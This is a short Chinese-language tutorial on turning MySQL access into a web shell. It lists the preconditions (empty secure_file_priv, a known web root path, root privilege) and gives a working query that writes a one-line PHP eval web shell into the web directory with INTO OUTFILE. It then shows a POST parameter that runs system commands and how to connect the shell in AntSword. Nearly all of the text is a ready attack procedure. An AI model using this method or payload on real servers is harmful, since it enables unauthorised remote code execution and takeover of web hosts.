SQL之getshell

1.条件

1.secure_file_priv值为空【代表已开启，能够写木马】

2.有绝对路径【配置文件中PHP中ctrl f找root】

3.具备root权限【user权限、root权限】

2.写木马

​

load_file

into outfile

写入木马【一句话木马】 注意大小写

select '<?php @eval($_POST[1]);?>' into outfile 'D:/web/PHPTutorial/WWW/6666.php'

将一句话木马写进D盘路径下创建的、名字为6666的php文件中

3.访问web页面

【命令执行】显示目录

1=system("dir")

​ 此处1的意义为post参数

4.连蚁剑

1.添加数据

地址--网址 密码--参数名（1）